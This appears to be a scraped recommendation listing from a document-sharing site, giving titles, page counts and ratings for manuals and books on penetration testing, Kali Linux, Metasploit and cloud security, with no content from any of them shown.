No ratings yet
Midi Smart Plus
22 pages
HUAWEI E392u-12 User Manual (V100R001 01)
No ratings yet
HUAWEI E392u-12 User Manual (V100R001 01)
2 pages
Active Directory Exploitation Cheat Sheet: Share
100% (1)
Active Directory Exploitation Cheat Sheet: Share
14 pages
Windows 10 Key
No ratings yet
Windows 10 Key
2 pages
Java Security: Unveiling the Secrets of Secure Coding
From Everand
Java Security: Unveiling the Secrets of Secure Coding
Pasquale De Marco
No ratings yet
Kali Linux Essentials: Definitive Reference for Developers and Engineers
From Everand
Kali Linux Essentials: Definitive Reference for Developers and Engineers
Richard Johnson
No ratings yet
Metasploit Pentesting: Hands-On Offensive Security Suite
From Everand
Metasploit Pentesting: Hands-On Offensive Security Suite
Rob Botwright
No ratings yet
Mastering Metasploit - Guide to Hacking & Pentesting: Security Books
From Everand
Mastering Metasploit - Guide to Hacking & Pentesting: Security Books
Erwin Dirks
No ratings yet
Cracking: Red team Hacking: Kali Linux, Parrot OS, BackBox & BlackArch
From Everand
Cracking: Red team Hacking: Kali Linux, Parrot OS, BackBox & BlackArch
Rob Botwright
No ratings yet
Moodle Security
From Everand
Moodle Security
Darko MiletiÄ‡
No ratings yet
OpenStack Cloud Security
From Everand
OpenStack Cloud Security
Fabio Alessandro Locati
No ratings yet
Mastering Kali Linux: Practical Security and Penetration Testing Techniques
From Everand
Mastering Kali Linux: Practical Security and Penetration Testing Techniques
Robert Johnson
No ratings yet
Hacker’s Guide to Machine Learning Concepts
From Everand
Hacker’s Guide to Machine Learning Concepts
Trilokesh Khatri
No ratings yet
OpenStack Orchestration
From Everand
OpenStack Orchestration
Adnan Ahmed Siddiqui
5/5 (1)
(Part 2) Java 4 Selenium WebDriver: Come Learn How To Program For Automation Testing
From Everand
(Part 2) Java 4 Selenium WebDriver: Come Learn How To Program For Automation Testing
Rex Jones
No ratings yet
OpenStack Object Storage (Swift) Essentials
From Everand
OpenStack Object Storage (Swift) Essentials
Amar Kapadia
No ratings yet
Mastering Nikto: A Comprehensive Guide to Web Vulnerability Scanning: Security Books
From Everand
Mastering Nikto: A Comprehensive Guide to Web Vulnerability Scanning: Security Books
Erwin Dirks
No ratings yet